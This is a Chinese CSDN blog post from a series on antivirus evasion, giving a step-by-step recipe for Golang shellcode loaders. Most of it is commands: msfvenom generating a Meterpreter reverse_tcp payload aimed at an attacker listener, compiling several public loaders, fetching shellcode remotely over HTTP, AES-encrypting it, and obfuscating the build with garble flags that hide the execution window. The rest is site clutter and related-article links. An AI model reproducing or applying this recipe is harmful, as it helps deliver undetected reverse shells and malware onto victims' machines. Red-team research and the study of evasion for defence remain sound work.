WEB渗透免杀篇-Golang免杀

最新推荐文章于 2024-08-20 22:16:43 发布
最新推荐文章于 2024-08-20 22:16:43 发布
阅读量205 收藏 4
点赞数 2
分类专栏: 渗透测试 文章标签: golang 渗透测试 网络安全 WEB渗透 WEB安全 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141362953
版权

 往期文章

 WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

WEB渗透免杀篇-免杀工具全集-CSDN博客

 

直接编译
生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
代码转换成0x格式,粘贴到go.txt中保存为go格式

image

安装golang环境在shellcode目录执行
>go build生成exe
编码编译
https://github.com/biggerduck/RedTeamNotes/blob/main/%E5%88%A9%E7%94%A8go%E5%8A%A0%E8%BD%BDshellcode%E5%85%8D%E6%9D%80.pdf
加载器
go-shellcode
https://github.com/brimstone/go-shellcode
进入cmd/sc目录编译sc.exe
>go build

image

生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 
加载器加载shellcode
>sc.exe shellcode

image

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip

>gsl -s SHELLCODE -hex msf生成hex格式
>gsl -f shell.raw本地加载raw格式文件
>gsl -f shell.hex -hex 本地加载hex格式文件
>gsl -u http://192.168.0.108/1.raw 远程加载
>gsl -u http://192.168.0.108/1.hex
go-shellcode-loader

https://github.com/HZzz2/go-shellcode-loader

>git clone https://github.com/HZzz2/go-shellcode-loader.git
>cd go-shellcode-loader
//下条命令安装第三方混淆库  GitHub地址:https://github.com/burrowers/garble
>go install mvdan.cc/garble@latest   
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
>base64 -w 0 -i rev.raw > rev.bs64
>cat rev.bs64

复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值

>go run aes-sc.go

复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序

>garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go

参数解释: garble(混淆库): -tiny 删除额外信息 -literals 混淆文字 -seed=random base64编码的随机种子 go: -w 去掉调试信息,不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口,不占用 cmd 终端。 (被查杀率高) -race 使数据允许竞争检测 编译后得到go-sc.exe

Pluto-2003
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
web渗透--67--OpenRasp-IAST二次开发说明
武天旭的博客
01-15 1551
IAST的二次开发,开发环境基于MACOS操作系统 一、安装基础环境 同https://security.blog.csdn.net/article/details/112670554,基础操作不再过多介绍 二、编译并运行管理后台 编译环境为CentOS-7,为什么要编译后台?因为二次开发要修改部分内容! 2.1、基础环境安装 1、安装最新版的golang,并配置环境变量 2、安装最新版的nodejs,并配置环境变量 3、安装最新版的npm,并配置环境变量
APT级全面免杀与企业纵深防御体系的红蓝对抗
悦分享
08-03 684
本文通过模拟APT演示了高级威胁的全面免杀能力,并站在防御者角度思考如何发现、检测和防御高级威胁攻击,从而了解到攻防的对抗性,体会了企业建设纵深防御体系的重要性。
WEB渗透Web突破-目录爆破
qq_59468567的博客
08-07 503
|工具名称| |cansina| |Cewl| |dirsearch| |dirsearch_bypass403| |dirb| |dirmap| |dontgo403| |feroxbuster| |ffuf| |gobuster| |gau| |gospider| |ihoneyBakFileScan_Modify| |jsluice| |katana| |spray| |urlfounder| |urlbrute| |URLFinder| |waybackurls| |wfuzz|
免杀对抗&Go魔改二开&Fscan扫描&FRP代理
qq_45087791的博客
04-09 2211
渗透测试过程中,有后渗透需求时,需要进行反向代理,最早接触的是frp工具,但是在使用过程当中会有配置文件落地,如果忘记删除的情况下容易被溯源C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征,在如今多种安全设备防护的内网会遭受到识别和拦截,如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。在落地使用过程中流量及文件不修改的情况下基本被检测查杀,针对这种情况,我们要进行了一些基本的参数测试和特征去除外加功能拓展。=>>直接编译(匹配hash值)=>>功能添加扫描项。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1138
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
web渗透测试----16、JSON注入
七天
06-22 3658
文章目录一、JSON简介二、JSON注入三、JSON注入的防御 一、JSON简介 1、简介 JSON是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器解析和生成。它是基于Javascript的一个子集,JSON采用完全独立于语言的文本格式,但是也使用类似于C语言家族的习惯(C、C#、C++、Java、Javascript、Perl、Python等都可以使用JSON),这些特性使JSON成为理想的数据交换语言。 JSON可以将Javascript中的对象转换为字符串,然后在函数、网络之间传递这个字
远控免杀从入门到实践(2)工具总结
weixin_46236101的博客
03-13 2514
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础 2、远控免杀从入门到实践 (2)工具总结 3、远控免杀从入门到实践 (3)代码-C/C++ 4、远控免杀从入门到实践 (4)代码-C# 5、远控免杀从入门到实践 (5)代码-Python 6、远控免杀从入门到实践 (6)代码-Powershell 7、远控免杀从入门到实.
渗透神器----Windows10 渗透工具包
热门推荐
tlovejr的博客
04-20 1万+
前言 这几天一直有工作,所以就没有来的及去更新靶场还有CTF试题,接下来给大家更新一个优秀的工具:2022年最新Windows10 渗透工具包镜像 系统简介 基于Win10 Workstation 21H2 x64 MSDN原版镜像制作; 完整安装WSL Kali Linux 2022.1,并配置图形化模式; 精简系统自带软件,美化字体及部分图标,适度优化; 镜像容量74.5G,使用单磁盘文件存储,提升性能; 建议运行环境: vmware:16.0 运行内存:8G 固态硬盘:100G 免责声明
渗透测试】Sunlogin-RCE(向日葵)
SunnyCat
02-17 5285
版本:11.0.0.33.162 安装路径:C:\Program Files\Oray\SunLogin\SunloginClient 一、安装启动向日葵 二、RCE执行 xrkRce.exe -h 192.168.221.130 -t scan -p 1-65535 xrkRce.exe -h 192.168.221.130 -t rce -p 2913 -c “whoami” windows复现成功 苹果复现失败 2022.2.17 久违 ...
Go-golang版的dsinff-webspy
08-13
网络安全领域,它可以帮助检测潜在的攻击或异常流量,辅助进行渗透测试安全审计;对于系统管理员,dsinff-webspy可以用来监控网络健康状况,排查网络问题。 五、使用与部署 尽管dsinff-webspy的内部实现涉及了...
基于浏览器爬虫golang开发的web漏洞主动(被动)扫描器.zip
11-30
【标题】: "基于浏览器爬虫的Go语言(GolangWeb漏洞主动与...综上所述,这个基于Go的Web漏洞扫描器结合了浏览器爬虫技术,旨在提供全面、高效的安全检测能力,对于Web应用的安全维护和渗透测试工作有着重要的价值。
AssassinGo - 基于Go的高并发可拓展式Web渗透框架.zip
07-18
《AssassinGo:基于Go语言的高并发可拓展Web渗透框架》 AssassinGo是一款专为Web渗透测试设计的框架,其核心特性是利用Go语言的高效并发能力,以及易于扩展的特性,使得在大规模、高并发的网络扫描和安全检测中表现...
ffuf - Go语言编写的Web目录DNS参数Fuzz工具.zip
07-18
FFUF是一款用Go语言编写的高效Web目录发现和Fuzzing工具。它的设计目标是提供一个快速、可扩展且易用的解决方案,用于在大型网络环境中寻找潜在的安全漏洞。Go语言以其并发性能和轻量级特性,使得FFUF能够处理大量的...
Go-XRay是一个用于从公共网络侦察映射和OSINT收集的工具
08-14
5. **Web应用指纹**:通过对响应头和内容的分析,XRay能识别出运行在目标服务器上的Web应用程序类型和版本,这对于识别已知漏洞和制定渗透测试策略非常有帮助。 OSINT(开放源情报)收集则是XRay的另一个关键功能。...
Golanggolang安装一些依赖包时总是失败
youngwhz1的专栏
08-16 245
/windows环境(不设置GO111MODULE为on也可以下载成功,是因为默认开启)export GOPROXY="https://goproxy.cn,direct" # 代理仓库配置。镜像站点中,direct可以指示Go回源到模块版本的源地址去抓取,比如github。(1)默认GOPROXY=https://proxy.golang.org,direct,国内无法访问。比如安装gin包:go get -u github.com/gin-gonic/gin。//windows环境设置代理。
goweb框架-gin
最新发布
z3551906947的博客
08-20 402
基数树(Radix Tree),又称前缀树(Trie),是一种用于快速检索的数据结构,特别适用于处理字符串的前缀匹配问题。节点:基数树由多个节点组成,每个节点代表字符串中的一个字符。根节点:代表空字符串,是树的起点。路径:从根节点到某一节点的序列,代表一个字符串的前缀。叶子节点:代表一个完整的字符串或模式。压缩:如果一个节点的所有子节点都只有一个子节点,该节点可以被压缩,从而节省空间。基数树的工作原理基于字符串的公共前缀,通过共享这些前缀来减少存储空间。
Golang】go mod的使用
youngwhz1的专栏
08-16 407
go get http://golang.org/x/text@342b2e 拉取 hash 为 342b231 的 commit,最终可能转换为 v0.3.2。创建go.mod文件后,直接go run 或 go build 将会自动下载依赖包,并将依赖关系和版本写到go.mod和go.sum文件中。go get http://golang.org/x/text@latest 拉取最新的版本,若存在tag,则优先使用。go mod tidy: 拉取缺少的模块,移除不用的模块。
深入理解 Go 并发原语
禅与代码的艺术
08-15 881
介绍了 Go 语言支持的两种原语 goroutine 和通道,以及 Go 库中的一些基本同步原语。
geoip2-golang
05-25
geoip2-golang 是一个 Go 语言库,用于解析 MaxMind GeoIP2 数据库。这个库可以让你轻松地将 IP 地址与其对应的地理位置信息匹配起来。GeoIP2 数据库包含详细的地理信息,例如国家、州/省、城市、邮政编码、经度和纬度等。您可以使用这些信息来进行地理定位、地理分析、以及其他与地理信息相关的操作。geoip2-golang 库是在 Apache 2.0 许可证下发布的,可以免费使用和修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值